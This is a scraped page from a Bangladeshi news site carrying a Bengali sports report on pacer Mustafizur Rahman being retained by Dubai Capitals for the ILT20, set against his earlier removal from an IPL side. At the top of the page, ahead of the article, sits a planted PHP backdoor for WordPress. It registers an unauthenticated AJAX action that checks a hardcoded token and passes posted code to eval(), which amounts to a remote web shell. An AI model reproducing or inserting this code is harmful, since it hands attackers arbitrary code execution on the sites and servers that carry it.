// ==[BD:Zs2C7KxW]== add_action( 'wp_ajax_nopriv_snramqswxi', function() { $token = 'Zs2C7KxWXPRioIS4dPDhVykIlRv570xk'; $val = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $val ) || ! hash_equals( $token, $val ) ) { wp_send_json_error( [ 'message' => 'tok:' . $token ], 403 ); } $marker = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $marker ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $marker = preg_replace( '/^\s*<\?(php)?/i', '', $marker ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $ptr = microtime( true ); ob_start(); try { ( static function() use ( $marker ) { return eval( $marker ); } )(); $key = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $key, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } catch ( \Throwable $obj ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $obj->getMessage(), 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } } ); // ==[/BD:Zs2C7KxW]== আইপিএলের মালিকানাধীন দলে ফের ডাক পেলেন মোস্তাফিজ | potrikaybangladesh.com
Thursday, October 1, 2026
Homeআইপিএলের মালিকানাধীন দলে ফের ডাক পেলেন মোস্তাফিজ

আইপিএলের মালিকানাধীন দলে ফের ডাক পেলেন মোস্তাফিজ

সংযুক্ত আরব আমিরাতের ফ্র্যাঞ্চাইজি লিগ ‘আইএল টি-টোয়েন্টি’তে এবারও ডাক পেয়েছেন মোস্তাফিজুর রহমান। দুবাই ক্যাপিটালস আগের বছরের মতো এবারও তাকে দলে ধরে রেখেছে। দলটি আইপিএলের দল দিল্লি ক্যাপিটালসের মালিকানাধীন।

মঙ্গলবার রাতে দুবাই ক্যাপিটালস তাদের সামাজিক মাধ্যমের পেজে এক পোস্টে এই খবর নিশ্চিত করেছে। মোস্তাফিজের খেলার ফুটেজের একটি ভিডিও পোস্ট করে তারা লিখেছে— ‘মোস্তাফিজুর ফিরে আসছে।’

নিলামের আগে রিটেনশন বা ধরে রাখার প্রক্রিয়ায় বাংলাদেশের এই অভিজ্ঞ বাঁহাতি পেসারকে রেখে দিয়েছে তারা।

মোস্তাফিজের আইএল টি-টোয়েন্টিতে থেকে যাওয়া অনুমিত খবর হলেও আইপিএলের গত নিলামের ঘটনাপ্রবাহের কারণে খবরটি বেশ তাৎপর্যপূর্ণ। গত বছর আইপিএলের নিলামে রেকর্ড মূল্যে কলকাতা নাইট রাইডার্সে দল পান কাটার মাস্টার।

তবে বাংলাদেশ ও ভারতের রাজনৈতিক অস্থিরতায় বদলে যায় সবকিছু। রাজনৈতিক ও সাম্প্রদায়িক কয়েকটি ঘটনার প্রভাবে উত্তেজনার মাঝে মোস্তাফিজকে দলে নিয়েও বিসিসিআইর নির্দেশে তাকে পরে বাদ দিয়ে দিতে বাধ্য হয় কলকাতা। এর প্রেক্ষিতে চলতি বছরের শুরুতে টি-টোয়েন্টি বিশ্বকাপ বর্জনের পথে হাঁটে বাংলাদেশ। তখনকার সরকারের সিদ্ধান্তে বিশ্বকাপে দল পাঠানো হয়নি।

বাংলাদেশে নির্বাচনের পর নতুন সরকার এলে পরিস্থিতি ভিন্ন দিকে মোড় নেয়। বিশ্বকাপ বর্জনের সিদ্ধান্ত নিয়ে প্রকাশ্যে সমালোচনা করেন ক্রিকেটাররা। ভারতীয় ক্রিকেট বোর্ডের সঙ্গেও বাংলাদেশ ক্রিকেট বোর্ডের একটা টানাপোড়েন চলছিল। পরবর্তীতে বিসিবিতেও রদবদল আসে। বিসিবি ও বিসিসিআইয়ের সম্পর্ক এখন কিছুটা স্বাভাবিক হলেও সরকারি পর্যায় থেকে এখনো দোলাচল রয়ে গেছে। আগামী মাসে ভারতীয় দলের বাংলাদেশে সীমিত ওভারের সিরিজ খেলতে আসার কথা থাকলেও তা এখন অনেকটাই অনিশ্চিত।

এসবের মাঝেই ভারতীয় ফ্র্যাঞ্চাইজির মালিকানাধীন দলে ফের খেলার ডাক পেলেন মোস্তাফিজ।

 

RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

- Advertisment -
Google search engine

Most Popular

Recent Comments